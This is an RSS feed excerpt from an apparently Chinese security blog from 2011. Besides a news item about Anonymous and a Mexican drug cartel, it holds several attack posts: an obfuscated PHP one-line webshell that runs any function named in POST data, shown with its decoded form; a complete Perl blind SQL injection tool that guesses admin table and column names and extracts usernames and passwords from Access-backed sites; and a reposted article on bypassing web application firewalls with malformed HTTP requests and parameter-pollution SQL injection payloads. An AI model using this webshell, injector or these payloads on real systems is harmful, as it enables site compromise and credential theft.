		<link>http://www.0x50sec.org/%e9%bb%91%e5%ae%a2%e7%bb%84%e7%bb%87%e4%b8%8e%e6%af%92%e8%b4%a9%e9%9b%86%e5%9b%a2%e5%af%b9%e5%b3%99%e5%8f%96%e8%83%9c-%e8%a2%ab%e7%bb%91%e6%88%90%e5%91%98%e8%8e%b7%e9%87%8a/</link>
		<comments>http://www.0x50sec.org/%e9%bb%91%e5%ae%a2%e7%bb%84%e7%bb%87%e4%b8%8e%e6%af%92%e8%b4%a9%e9%9b%86%e5%9b%a2%e5%af%b9%e5%b3%99%e5%8f%96%e8%83%9c-%e8%a2%ab%e7%bb%91%e6%88%90%e5%91%98%e8%8e%b7%e9%87%8a/#comments</comments>
		<pubDate>Sun, 06 Nov 2011 04:29:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻八卦]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=1208</guid>
		<description><![CDATA[中新社柏林11月5日电 (记者 黄霜红)日前在网络轰动一时的“匿名者”黑客组织叫板墨西哥贩毒集团事件有了结果，该组织5日向德国媒体证实，遭受绑架的人质已获释。一名“匿名者”南美小组创建者接受德国《镜报》采访时说，他在网络论坛上和那名获释者交流过，该人叙述了自己的姓名以及被绑经过，所有细节都证实了其真实性。 获释者还在论坛上发出警告说，自己获释时遭贩毒集团威胁，如果“匿名者”成员不遵守与贩毒集团协议公布任何毒贩名单，黑客们将为每个名字付出10位家人的生命。 “匿名者”掌握了贩毒集团Zetas的大量信息。几个月前该组织破解了政府公务员的大约上万封电邮，从而侦察到一些公务员和贩毒集团的往来情况，贩毒集团还向一些议员支付“保护费”以避免刑罚。该组织原计划在月底公开部分信息。 在黑客组织一名成员被绑架之后，“匿名者”在网络宣布，如贩毒集团不释放人质，将从本月5日开始逐渐公开Zetas成员以及帮手的名单，毒贩中包括出租司机、记者以及警察。“匿名者”的威胁迅速传遍网络并轰动一时。 网友获释表示“匿名者”的威胁产生作用，该组织已表示不会公布上述信息。“匿名者”解释说，贩毒集团并非该组织的目标，他们主要针对的是政府公务员的腐败行为。 墨西哥贩毒集团Zetas被认为是该国最大最残忍的一个犯罪集团。2006年墨西哥政府公开与之宣战以来，在反毒战斗中丧生的人数达约4.5万。日前获释的黑客成员称和其他4人一道遭绑架，5人中有1人遇害。]]></description>
			<content:encoded><![CDATA[<p><strong>中新社柏林11月5日电 (记者 黄霜红)日前在网络轰动一时的“匿名者”黑客组织叫板墨西哥贩毒集团事件有了结果，该组织5日向德国媒体证实，遭受绑架的人质已获释。</strong>一名“匿名者”南美小组创建者接受德国《镜报》采访时说，他在网络论坛上和那名获释者交流过，该人叙述了自己的姓名以及被绑经过，所有细节都证实了其真实性。<br />
获释者还在论坛上发出警告说，自己获释时遭贩毒集团威胁，如果“匿名者”成员不遵守与贩毒集团协议公布任何毒贩名单，黑客们将为每个名字付出10位家人的生命。<br />
“匿名者”掌握了贩毒集团Zetas的大量信息。几个月前该组织破解了政府公务员的大约上万封电邮，从而侦察到一些公务员和贩毒集团的往来情况，贩毒集团还向一些议员支付“保护费”以避免刑罚。该组织原计划在月底公开部分信息。<br />
在黑客组织一名成员被绑架之后，“匿名者”在网络宣布，如贩毒集团不释放人质，将从本月5日开始逐渐公开Zetas成员以及帮手的名单，毒贩中包括出租司机、记者以及警察。“匿名者”的威胁迅速传遍网络并轰动一时。<br />
网友获释表示“匿名者”的威胁产生作用，该组织已表示不会公布上述信息。“匿名者”解释说，贩毒集团并非该组织的目标，他们主要针对的是政府公务员的腐败行为。<br />
墨西哥贩毒集团Zetas被认为是该国最大最残忍的一个犯罪集团。2006年墨西哥政府公开与之宣战以来，在反毒战斗中丧生的人数达约4.5万。日前获释的黑客成员称和其他4人一道遭绑架，5人中有1人遇害。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e9%bb%91%e5%ae%a2%e7%bb%84%e7%bb%87%e4%b8%8e%e6%af%92%e8%b4%a9%e9%9b%86%e5%9b%a2%e5%af%b9%e5%b3%99%e5%8f%96%e8%83%9c-%e8%a2%ab%e7%bb%91%e6%88%90%e5%91%98%e8%8e%b7%e9%87%8a/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>有趣的新型PHP一句话后门</title>
		<link>http://www.0x50sec.org/%e6%9c%89%e8%b6%a3%e7%9a%84%e6%96%b0%e5%9e%8bphp%e4%b8%80%e5%8f%a5%e8%af%9d%e5%90%8e%e9%97%a8/</link>
		<comments>http://www.0x50sec.org/%e6%9c%89%e8%b6%a3%e7%9a%84%e6%96%b0%e5%9e%8bphp%e4%b8%80%e5%8f%a5%e8%af%9d%e5%90%8e%e9%97%a8/#comments</comments>
		<pubDate>Wed, 26 Oct 2011 06:51:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[工具代码]]></category>
		<category><![CDATA[PHP一句话后门]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=1200</guid>
		<description><![CDATA[前几天跟lcx老大讨论了某论坛的全符号的一句话后门（这貌似不是一句话了是N句了）. &#60;?php $_=&#8221;"; $_[+""]=&#8221;; $_=&#8221;$_&#8221;.&#8221;"; $_=($_[+""]&#124;&#8221;&#8221;).($_[+""]&#124;&#8221;&#8221;).($_[+""]^&#8221;&#8221;); ?&#62; &#60;?php ${&#8216;_&#8217;.$_}['_'](${&#8216;_&#8217;.$_}['__']);?&#62; 经过测试发现原来一个数组跟一个字符串连接后会强制把数组转换为字符串&#8221;Array&#8221;，所以也就有了上面那个一句话后门。 解密一下其实就是这个样子。 &#60;?php $_=&#8221;";            //$_空字符串 $_[+""]=&#8221;;        //$_[0]为空字符串 $_=&#8221;$_&#8221;.&#8221;";        //数组跟空字符串连接后(经php强制转换)    变成了字符串&#8221;Array&#8221; 所以$_[+""]相当于$_[0]=&#8217;A&#8217; $_=($_[+""]^&#8221;&#8221;).($_[+""]^&#8221;&#8221;).($_[+""]^&#8221;&#8221;).($_[+""]^&#8221;&#8221;);    //POST //$_=($_[+""]&#124;&#8221;&#8221;).($_[+""]&#124;&#8221;&#8221;).($_[+""]^&#8221;&#8221;);                    //GET @${&#8216;_&#8217;.$_}['_'](${&#8216;_&#8217;.$_}['__']);                                    //$_POST[_]($_POST[__]) ?&#62; &#160;]]></description>
			<content:encoded><![CDATA[<p>前几天跟lcx老大讨论了某论坛的全符号的一句话后门（这貌似不是一句话了是N句了）.</p>
<p>&lt;?php<br />
$_=&#8221;";<br />
$_[+""]=&#8221;;<br />
$_=&#8221;$_&#8221;.&#8221;";<br />
$_=($_[+""]|&#8221;&#8221;).($_[+""]|&#8221;&#8221;).($_[+""]^&#8221;&#8221;);<br />
?&gt;<br />
&lt;?php ${&#8216;_&#8217;.$_}['_'](${&#8216;_&#8217;.$_}['__']);?&gt;</p>
<p>经过测试发现原来一个数组跟一个字符串连接后会强制把数组转换为字符串&#8221;Array&#8221;，所以也就有了上面那个一句话后门。<br />
解密一下其实就是这个样子。</p>
<p>&lt;?php<br />
$_=&#8221;";            //$_空字符串<br />
$_[+""]=&#8221;;        //$_[0]为空字符串<br />
$_=&#8221;$_&#8221;.&#8221;";        //数组跟空字符串连接后(经php强制转换)    变成了字符串&#8221;Array&#8221; 所以$_[+""]相当于$_[0]=&#8217;A&#8217;<br />
$_=($_[+""]^&#8221;&#8221;).($_[+""]^&#8221;&#8221;).($_[+""]^&#8221;&#8221;).($_[+""]^&#8221;&#8221;);    //POST<br />
//$_=($_[+""]|&#8221;&#8221;).($_[+""]|&#8221;&#8221;).($_[+""]^&#8221;&#8221;);                    //GET<br />
@${&#8216;_&#8217;.$_}['_'](${&#8216;_&#8217;.$_}['__']);                                    //$_POST[_]($_POST[__])<br />
?&gt;</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e6%9c%89%e8%b6%a3%e7%9a%84%e6%96%b0%e5%9e%8bphp%e4%b8%80%e5%8f%a5%e8%af%9d%e5%90%8e%e9%97%a8/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Blind Access SQL Injector (perl)</title>
		<link>http://www.0x50sec.org/blind-access-sql-injector-perl/</link>
		<comments>http://www.0x50sec.org/blind-access-sql-injector-perl/#comments</comments>
		<pubDate>Tue, 20 Sep 2011 15:28:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[工具代码]]></category>
		<category><![CDATA[Access]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Perl]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=1191</guid>
		<description><![CDATA[最近找了个milw0rm风格的模板做了几个页面，主要是对博客一点都不简洁的东西有些忍受不了。 还有就是要测试一些asp+access的网站，懒的开虚拟机去扫注射什么的，就把原来用C语言写的小程序，改进了判断注射的方法，增加了对COOKIE进行检测的功能，用着还比较顺手，轻量级的就是比较快也容易控制。然后稍微一改就写了个注射access的小脚本，也没什么用纯属娱乐。 下载地址:http://www.cli5.com/paper/38 #!/usr/bin/perl # blind access sqlinjector [GET Method] # for educational purpose only! # Code by c4rp3nt3r@0x50sec.org #其实没多大作用 use POSIX; use LWP::UserAgent; #######!!!!!!SET THE FOLLOWING TWO LINES $target ="http://www.cli5.com/exploit.asp?id=111"; $turestr='2011-1-1'; #######!!!!!! $comstr=""; #%00 $nullstr="+"; #%20 %09 %0a print "\n"; print "\t&#124;=-----------------------------------------=&#124;\n"; print "\t&#124;=---[ Blind Access SQL Injector V1.0 ]----=&#124;\n"; print "\t&#124;=-------[ c4rp3nt3r\@0x50sec.org ]---------=&#124;\n"; [...]]]></description>
			<content:encoded><![CDATA[<p>最近找了个milw0rm风格的模板做了几个页面，主要是对博客一点都不简洁的东西有些忍受不了。<br />
还有就是要测试一些asp+access的网站，懒的开虚拟机去扫注射什么的，就把原来用C语言写的小程序，改进了判断注射的方法，增加了对COOKIE进行检测的功能，用着还比较顺手，轻量级的就是比较快也容易控制。然后稍微一改就写了个注射access的小脚本，也没什么用纯属娱乐。<br />
下载地址:<a href="http://www.cli5.com/paper/38">http://www.cli5.com/paper/38</a></p>
<pre>
#!/usr/bin/perl
# blind access sqlinjector [GET Method]
# for educational purpose only!
# Code by c4rp3nt3r@0x50sec.org
#其实没多大作用

use POSIX;
use LWP::UserAgent;

#######!!!!!!SET THE FOLLOWING TWO LINES
$target ="http://www.cli5.com/exploit.asp?id=111";
$turestr='2011-1-1';
#######!!!!!!

$comstr="";		#%00
$nullstr="+";	#%20 %09 %0a 

print "\n";
print "\t|=-----------------------------------------=|\n";
print "\t|=---[ Blind Access SQL Injector V1.0 ]----=|\n";
print "\t|=-------[ c4rp3nt3r\@0x50sec.org ]---------=|\n";
print "\t|=-----------------------------------------=|\n\n";

main();

sub main
{

	print 'Choose a number to be execute:
	[a] fuzz table_name
	[b] fuzz column_name
	[c] sql (Dump data)
	';
	print "\n";
	print "Choose a number#";
	$xnum= <STDIN>; chomp $xnum;

	if($xnum eq 'a')
	{
		fuzz_tb();
	}elsif($xnum eq 'b')
	{
		print "Enter The table name to fuzz the column#";
		$sql_stdin= <STDIN>; chomp $sql_stdin;
		fuzz_pwd_usr_clm($sql_stdin);
	}elsif($xnum eq 'c')
	{
		print "Enter The admin table name#";
		$t_admin = <STDIN>; chomp $t_admin;
		print "Enter the user column name#";
		$t_user = <STDIN>; chomp $t_user;
		print "Enter the pass column name#";
		$t_pass = <STDIN>; chomp $t_pass;
		dump_fuzz_half($t_admin,$t_user,$t_pass);
	}

}

#################
sub fuzz_tb
{
print "[*] Fuzz admin table name...\n";
$xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--

#print "$sql\n\007\n";
@ok_tbname=();
$long=@ok_tbname;

#print "[*] Guess table name...\n\n";
@tables=(
'admin',
'admins',
'users',
'user',
'usr_pw',
'salt',
'members',
'mysql.user',
'think_md5hash',
'hash',
'login',
'log_user',
'admin_user',
'adminuser',
'member_admin',
'AdminUsers',
'administrables',
'administrateur',
'administrateurs',
'login_admin',
'login_admins',
'login_user',
'login_users',
'lost_pass',
'lost_passwords',
'lostpass',
'lostpasswords',
'stnuser',
'stuser',
'stusers',
'stuseres',
'staff',
'u_name',
'u_p',
'u_pass',
'Benutzer',
'usercontrol',
'user_pw',
'Benutzerliste',
'userlogins',
'userpasswd',
'admuser',
'system',
'adm',
'tb_user',
'x_admin',
'm_admin',
'manage',
'member',
'tbl_user',
'tbl_users',
'tbl_admin',
'tbl_admins',
'tbl_member',
'tbl_members',
'tbladmins',
'admin_user',
'admin_userinfo',
'administrator',
'adminid',
'admin_id',
'adminuserid',
'admin_userid',
'AdminUID',
'adminusername',
'admin_username',
'adminname',
'admin_name',
'wp_users',
);
	foreach $tbname(@tables)
	{
		$final=$target.$xsql.$nullstr.$tb_prefix.$tbname.')'.$comstr;
		$ua =  new LWP::UserAgent or die;
		$ua->timeout(35);
		$ua->proxy("http", "http://$proxy/") if defined($proxy);
		$tbres = $ua->get($final);
		print "[*] Fuzz table name [$tbname]"."\n";
		#print $final."\n";
		if($tbres->content =~ /$turestr/)
		{
			$result=$result."[+] Found ->".$tbname."\n\n";
			print " \n[+] Found table_name-> [$tbname]"."\n\n";
			$long=@ok_tbname;
			@ok_tbname[$long]=$tbname;	#将存在的表名放到一个数组里
		}
	}

}

sub fuzz_pwd_usr_clm
{
my($xok_tbname)=@_;

##-------
@usrclms=(
'username',
'user_name',
'user',
'login',
'admin',
'adminname',
'admin_id',
'usr',
'name',
'u_name',
'administrators',
'administrator',
'adminuser',
'adminname',
'admin_name',
'admin_user',
'admin_username',
'user_admin',
'user_n',
'user_un',
'user_uname',
'user_username',
'user_usernm',
'user_usernun',
'user_usrnm',
'usr',
'email',
'mail',
'usr_n',
'usr_name',
'usr_pass',
'usr2',
'usrn',
'usrnam',
'usrname',
'usrnm',
'adminusername',
'bbsuser',
'bbsid',
'bbsusername',
'permission',
'access',
'accnt',
'accnts',
'account',
'accounts',
'qq',
'帐号',
'管理员',
'权限',
'用户名',
'会员',
'用户帐号',
);
@pwdclms=(
'password',
'pwd',
'userpass',
'pass',
'psw',
'userpwd',
'userpw',
'psd',
'pw',
'user_pass',
'admin_password',
'PassWD',
'user_password',
'uPassword',
'user_pwd',
'adminpwd',
'admin_pass',
'admin_password',
'login_pass',
'login_passwd',
'login_password',
'login_pw',
'login_pwd',
'login_user',
'login_username',
'adminpsw',
'adminupass',
'user_pass',
'user_passw',
'user_passwd',
'user_pw',
'user_pwd',
'user_pword',
'pword',
'user_pwrd',
'密码',
'用户密码',
'编号',
);

	print "\n[*] Fuzz user column name...\n\n";
	my $ua = new LWP::UserAgent or die;
	$i=0;
	$ua -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920	Firefox/3.0.4");
	foreach $usr_clm(@usrclms)
	{

		$xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
		$final=$target.$xsql;
		$tbres = $ua->get($final);
		print "[*] Fuzz [$usr_clm] from $xok_tbname \n";
		#print $final."\n";
		if($tbres->content =~ /$turestr/)
		{	$result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
			print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
			$usr=$usr_clm;
			last;
		}
	}

	print "\n[*] Fuzz password column name...\n\n";
	foreach $pwd_clm(@pwdclms)
	{
		$xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
		$final=$target.$xsql;

		$tbres = $ua->get($final);
		print "[*] Fuzz [$pwd_clm] from [$xok_tbname] \n";
		#print $final."\n";
		if($tbres->content =~ /$turestr/)
		{	$result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
			print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
			$pwd=$pwd_clm;
			last;
		}
	}

	print "[+] Found column_name->"." [$usr] [$pwd] "." from table_name->"."[$xok_tbname]"."\n\n";
}

#################################
sub dump_fuzz_half
{
	$|=1;	# 立即刷新缓冲区输出内容
	my($xok_tbname,$usr,$pwd) = @_; 

	$fuzzsql="seleCt".$nullstr."count(*)".$nullstr.'from'.$nullstr.$xok_tbname;
	print "[*]$fuzzsql:\n";
	$count = fuzz_half($fuzzsql,0,45);
	if($count<=0)
	{
		print "[-]Count(*) of $xok_tbname is less than zero!\n";
		exit;
	}else
	{
		print "[+]Count(*) of $xok_tbname is: [$count]\n";
	}

	$fuzzsql="seleCt".$nullstr.'top'.$nullstr.'1'.$nullstr."len($usr)".$nullstr.'from'.$nullstr.$xok_tbname;
	print "[*]$fuzzsql:\n";
	$len = fuzz_half($fuzzsql,0,45);
	if($len<=0)
	{
		print "[-]Length of top 1 $usr is less than zero!\n";
		exit;
	}else
	{
		print "[+]Length of top 1 $usr is: [$len]\n";
	}
	@okusr=();
	@okpwd=();
	printf("[+]SeleCt top 1 [$usr] from [$xok_tbname]: ");
	for($subset=1;$subset<=$len;$subset++)
	{
		$fuzzsql='seleCt'.$nullstr.'top'.$nullstr.'1'.$nullstr."asc(mid($usr,$subset,1))".$nullstr.'frOm'.$nullstr.$xok_tbname;
		$long=@okusr;
		$ret=fuzz_half($fuzzsql,0,127);
		@okusr[$long]=$ret;
		printf("%c",$ret);
	}
	print "\n[";
	foreach $xoktbnum(@okusr)
	{
		printf("%c",$xoktbnum);
	}
	print "]\n";

	$fuzzsql='seleCt'.$nullstr.'top'.$nullstr.'1'.$nullstr."len($pwd)".$nullstr.'from'.$nullstr.$xok_tbname;
	print "[*]$fuzzsql:\n";
	$len = fuzz_half($fuzzsql,0,45);
	if($len<=0)
	{
		print "[-]Length of top 1 $pwd is less than zero!\n";
		exit;
	}else
	{
		print "[+]Length of top 1 $pwd is: [$len]\n";
	}
	printf("[+]SeleCt top 1 [$pwd] from [$xok_tbname]: ");
	for($subset=1;$subset<=$len;$subset++)
	{
		$fuzzsql='seleCt'.$nullstr.'top'.$nullstr.'1'.$nullstr."asc(mid($pwd,$subset,1))".$nullstr.'frOm'.$nullstr.$xok_tbname;
		$long=@okpwd;
		$ret=fuzz_half($fuzzsql,0,127);
		@okpwd[$long]=$ret;
		printf("%c",$ret);
	}
	print "\n[";

	foreach $xoktbnum(@okpwd)
	{
		printf("%c",$xoktbnum);
	}
	print "]\n\n";
	$fuzzsql="seleCt".$nullstr.'top'.$nullstr.'1'.$nullstr."$usr,$pwd".$nullstr.'from'.$nullstr.$xok_tbname;
	printf "[+]$fuzzsql:\n";
	print "[$usr] : ";
	foreach $xoktbnum(@okusr)
	{
		printf("%c",$xoktbnum);
	}
	print "\n";
	print "[$pwd] : ";
	foreach $xoktbnum(@okpwd)
	{
		printf("%c",$xoktbnum);
	}
	print "\n\n";

}

##################################
sub fuzz_half	#order by语句递归查询函数采用折半法
{
    #($min,$max)区间代表一个范围，正确的字段数在其中我们折半缩小之直到找到正确字段数
    #$min 代表能够正常显示的已经确定的最小整数
    #$max 代表不能够正常显示的已经确定的最小整数，作为我们可以确定的范围的最大数所以叫其"max"
    my ($sql,$min,$max) = @_;
    $x_fuzzsql=$sql;
    if($max==0&#038;&#038;$min==0)
    {
		return 0;
    }
    if($max-$min==1)#如果能正常显示的最小整数比不能正常显示的最小整数大一那么最小的数$min
    {				#就是要找的正确字段数目退出递归函数返回之
    	return $max;
    }
	#如果上面条件没成立就取范围中间的数字作为order by查询字段数
	my $mid=int(($min+$max)/2);#取两个正整数的平均值
	#print "max:$max,min:$min,mid=$mid\n";
	$final=$nullstr."AnD"."($sql)>";
	$final = $target.$final.$mid.$comstr;
	#print "[*] Test ($sql)>$mid...\n";
	#print $final."\n";
	my $lwp = new LWP::UserAgent or die;
	$lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
	my $res = $lwp->get($final);
	my $myres=$res->content; #for test
	if($res->content =~ /$turestr/)
	{
		$min=$mid;
		fuzz_half($sql,$min,$max);
	}
	else
	{
		$max=$mid;
		fuzz_half($sql,$min,$max);
	}
}
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/blind-access-sql-injector-perl/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>LFI WITH PHPINFO() ASSISTANCE</title>
		<link>http://www.0x50sec.org/lfi-with-phpinfo-assistance/</link>
		<comments>http://www.0x50sec.org/lfi-with-phpinfo-assistance/#comments</comments>
		<pubDate>Wed, 14 Sep 2011 02:37:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[lfi]]></category>
		<category><![CDATA[PHPINFO]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=1185</guid>
		<description><![CDATA[LFI WITH PHPINFO() ASSISTANCE LFI WITH PHPINFO() ASSISTANCE.pdf]]></description>
			<content:encoded><![CDATA[<p>LFI WITH PHPINFO() ASSISTANCE<br />
<a href='http://www.0x50sec.org/wp-content/uploads/2011/09/17799.pdf'>LFI WITH PHPINFO() ASSISTANCE.pdf</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/lfi-with-phpinfo-assistance/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>浅谈绕过WAF的数种方法</title>
		<link>http://www.0x50sec.org/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95/</link>
		<comments>http://www.0x50sec.org/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95/#comments</comments>
		<pubDate>Tue, 06 Sep 2011 08:21:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[新闻八卦]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=1183</guid>
		<description><![CDATA[浅谈绕过WAF的数种方法:http://www.80sec.com/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95.html EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011-09-06 From: http://www.80sec.com/?p=244 0×00 前言 08年初诞生了一种SQL群注攻击，黑客在全球范围内对asp，asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入，黑客通过一条结合游标的SQL语句就能将整个数据库的字段内容自动进行篡改，可以在网站上无差别的进行网页木马攻击。 互联网是快速更新迭代的，但是很多没有开发能力的单位都是通过外包建立网站，网站的程序一上线就再也无人维护，很多程序存在各种漏洞无法修补，于是 WAF便有了市场，现今门槛低且最能解决问题的是针对IIS/apache的软件WAF，通常一个模块一个扩展就能搞定，当然也有耗资百万千万的硬件 WAF，然而如果WAF拦截规则出现漏洞，这百万千万的硬件也就是一堆废铁。那么WAF是否真的可以解决所有的WEB安全问题呢？所以本文主要解析一些可以绕过WAF的罕见漏洞，供安全人员参考。 0×01 Request对象的包解析漏洞. asp和asp.net的Request对象存在一个包解析漏洞，Request对象对于GET和POST包的解析过于宽松，用一句话表达就是 Request对象它GET和POST傻傻分不清楚，稍有点web开发经验的同学应该知道Request接收GET,POST,COOKIE也就是GPC 传过来的数据，但是asp和.net库内置的Request对象完全不按RFC标准来，下面我们可以做个测试： 分别将下面两段代码保存为1.asp和1.aspx 使用asp的Request对象接收t参数传值 ———————————————– ＜% Response.Write “Request:” &#038; Request(“t”) %＞ ———————————————– 使用asp.net的Request对象接收t参数传值 ———————————————– ＜%@ Page Language=”C#” %＞ ＜% string test = Request["t"]; Response.Write(“Request:”+test); %＞ ———————————————– 使用下面的python脚本调用socket发送原始的HTTP包 ———————————————– #!/usr/bin/env python import socket host = ’192.168.239.129′ path = [...]]]></description>
			<content:encoded><![CDATA[<p>浅谈绕过WAF的数种方法:<a href="http://www.80sec.com/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95.html">http://www.80sec.com/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95.html</a><br />
EMail: rayh4c#80sec.com<br />
Site: http://www.80sec.com<br />
Date: 2011-09-06<br />
From: http://www.80sec.com/?p=244</p>
<p>0×00 前言</p>
<p>08年初诞生了一种SQL群注攻击，黑客在全球范围内对asp，asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入，黑客通过一条结合游标的SQL语句就能将整个数据库的字段内容自动进行篡改，可以在网站上无差别的进行网页木马攻击。</p>
<p>互联网是快速更新迭代的，但是很多没有开发能力的单位都是通过外包建立网站，网站的程序一上线就再也无人维护，很多程序存在各种漏洞无法修补，于是 WAF便有了市场，现今门槛低且最能解决问题的是针对IIS/apache的软件WAF，通常一个模块一个扩展就能搞定，当然也有耗资百万千万的硬件 WAF，然而如果WAF拦截规则出现漏洞，这百万千万的硬件也就是一堆废铁。那么WAF是否真的可以解决所有的WEB安全问题呢？所以本文主要解析一些可以绕过WAF的罕见漏洞，供安全人员参考。</p>
<p>0×01 Request对象的包解析漏洞.</p>
<p>asp和asp.net的Request对象存在一个包解析漏洞，Request对象对于GET和POST包的解析过于宽松，用一句话表达就是 Request对象它GET和POST傻傻分不清楚，稍有点web开发经验的同学应该知道Request接收GET,POST,COOKIE也就是GPC 传过来的数据，但是asp和.net库内置的Request对象完全不按RFC标准来，下面我们可以做个测试：</p>
<p>分别将下面两段代码保存为1.asp和1.aspx</p>
<p>使用asp的Request对象接收t参数传值<br />
———————————————–<br />
＜%<br />
Response.Write “Request:” &#038; Request(“t”)<br />
%＞<br />
———————————————–</p>
<p>使用asp.net的Request对象接收t参数传值<br />
———————————————–<br />
＜%@ Page Language=”C#” %＞<br />
＜%<br />
string test = Request["t"];<br />
Response.Write(“Request:”+test);<br />
%＞<br />
———————————————–</p>
<p>使用下面的python脚本调用socket发送原始的HTTP包<br />
———————————————–<br />
#!/usr/bin/env python</p>
<p>import socket</p>
<p>host = ’192.168.239.129′<br />
path = ‘/1.asp’<br />
port = 80</p>
<p>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
s.connect((host, port))<br />
s.settimeout(8)</p>
<p>exploit_packet=”t=’/**/or/**/1=1–”<br />
exploit_packet+=”\r\n” * 8<br />
packet_length = len(exploit_packet)<br />
packet=’GET ‘ + path + ‘ HTTP/1.1\r\n’<br />
packet+=’Host: ‘ + host + ‘\r\n’<br />
packet+=’Content-Length: %s\r\n’ % packet_length<br />
packet+=’Content-Type: application/x-www-form-urlencoded\r\n’<br />
packet+=’\r\n’<br />
packet = packet + exploit_packet</p>
<p>print packet<br />
s.send(packet)<br />
buf = s.recv(1000)<br />
if buf: print buf[buf.rfind("\r\n"):]<br />
s.close()<br />
———————————————–</p>
<p>我们发送的原始包是：<br />
GET /1.asp HTTP/1.1<br />
Host: 192.168.239.129<br />
Content-Length: 34<br />
Content-Type: application/x-www-form-urlencoded</p>
<p>t=’/**/or/**/1=1–</p>
<p>结果返回如下：<br />
Request:’/**/or/**/1=1–<br />
将python测试脚本的path改为/1.aspx测试页返回同样结果。</p>
<p>我们可以看到这是一个畸形的HTTP GET请求包，这个包的奥秘在于t=’/**/or/**/1=1–参数后的8个回车换行和Content-Length头，包的结构类似于一个POST 包，而请求的方法是GET,最后asp和asp.net的Request对象成功的解析了这个畸形包取出了数据。</p>
<p>所以如果WAF没有处理好HTTP包的内容，沿用常规思路处理GET和POST的逻辑的话，那么这个畸形包将会毁掉WAF的基础防御。</p>
<p>0×02 被遗忘的复参攻击.</p>
<p>大家应该还记得09年的HTTP Parameter Pollution攻击，查看[3]文档，可以发现ASP/IIS和ASP.NET/IIS的场景下存在一个复参特性，本文将利用这种的特性的攻击简称为复参攻击，用0X01里的例子简单的测试一下:</p>
<p>用GET请求传入两个t参数<br />
GET http://192.168.239.129/1.asp?t=1&#038;t=2<br />
将返回<br />
Request:1, 2</p>
<p>asp和asp.net的Request对象接收了两个参数，并且以逗号分隔，所以便衍生出了[3]文档中的复参SQL注入方法：</p>
<p>Vulnerable code：<br />
SQL=”select key from table where id=”+Request.QueryString(“id”)</p>
<p>This request is successfully performed using the HPP technique：<br />
/?id=1/**/union/*&#038;id=*/select/*&#038;id=*/pwd/*&#038;id=*/from/*&#038;id=*/users</p>
<p>The SQL request becomes：<br />
select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/usersLavakumarKuppan,</p>
<p>我们可以看到通过巧妙的运用注释符结合复参特性可以分割GET参数中的SQL注入语句，如果WAF对GET参数的处理过于简单是不是会匹配不到拦截规则呢?</p>
<p>0×03 高级复参攻击.</p>
<p>ASP.NET的Request对象有一个Params属性，ASP.NET程序员在一些程序中会使用Request.Params["xxx"] 传入数据，参考[4]微软MSDN文档我们可以知道Params属性的特性，该属性接收GET,POST和Cookie的传值集合，这里我们可以修改 0×01里的例子测试一下：</p>
<p>使用asp.net的Request.Params方法接收t参数传值<br />
———————————————–<br />
＜%@ Page Language=”C#” %＞<br />
＜%<br />
string test = Request.Params["t"];<br />
Response.Write(“Request:”+test);<br />
%＞<br />
———————————————–</p>
